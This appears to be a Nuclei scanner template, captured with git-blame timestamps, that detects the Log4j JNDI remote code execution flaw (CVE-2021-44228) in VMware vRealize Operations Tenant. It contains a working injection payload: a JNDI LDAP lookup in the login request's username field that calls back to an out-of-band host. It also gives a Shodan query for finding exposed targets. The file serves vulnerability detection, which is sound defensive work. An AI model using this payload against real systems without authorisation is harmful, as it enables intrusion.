2022-03-07 10:16:57 +00:00
id : vrealize-operations-log4j-rce
2022-03-07 09:43:20 +00:00
info :
2022-10-10 19:51:42 +00:00
name : VMware vRealize Operations Tenant - JNDI Remote Code Execution (Apache Log4j)
2022-03-07 09:43:20 +00:00
author : bughuntersurya
severity : critical
2022-07-16 17:05:27 +00:00
description : |
VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
2022-03-22 03:48:47 +00:00
reference :
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- https://core.vmware.com/vmsa-2021-0028-questions-answers-faq
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046
2022-07-16 17:05:27 +00:00
- https://logging.apache.org/log4j/2.x/security.html
2022-03-22 03:48:47 +00:00
classification :
2022-10-10 20:06:39 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10
2022-10-10 19:51:42 +00:00
cve-id : CVE-2021-44228
2022-10-19 21:11:27 +00:00
cwe-id : CWE-77
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-04-22 10:38:41 +00:00
shodan-query : http.title:"vRealize Operations Tenant App"
2022-10-10 20:06:39 +00:00
verified : "true"
tags : cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
2022-03-07 09:43:20 +00:00
2023-05-03 18:46:17 +00:00
variables :
rand1 : '{{rand_int(111, 999)}}'
rand2 : '{{rand_int(111, 999)}}'
2023-04-27 04:28:59 +00:00
http :
2022-03-07 09:43:20 +00:00
- raw :
- |
POST /suite-api/api/auth/token/acquire HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
Origin : {{RootURL}}
Referer : {{RootURL}}/ui/
2023-05-03 18:46:17 +00:00
{"username" : "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}" , "password" : "admin" }
2022-03-07 09:43:20 +00:00
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns" # Confirms the DNS Interaction
- type : regex
part : interactsh_request
regex :
2023-05-03 18:46:17 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2022-03-07 09:43:20 +00:00
extractors :
2023-05-03 18:46:17 +00:00
- type : kval
kval :
- interactsh_ip # Print remote interaction IP in output
- type : regex
part : interactsh_request
group : 2
regex :
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
2022-03-07 09:43:20 +00:00
- type : regex
part : interactsh_request
group : 1
regex :
2023-05-03 18:46:17 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2022-03-22 03:48:47 +00:00
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/05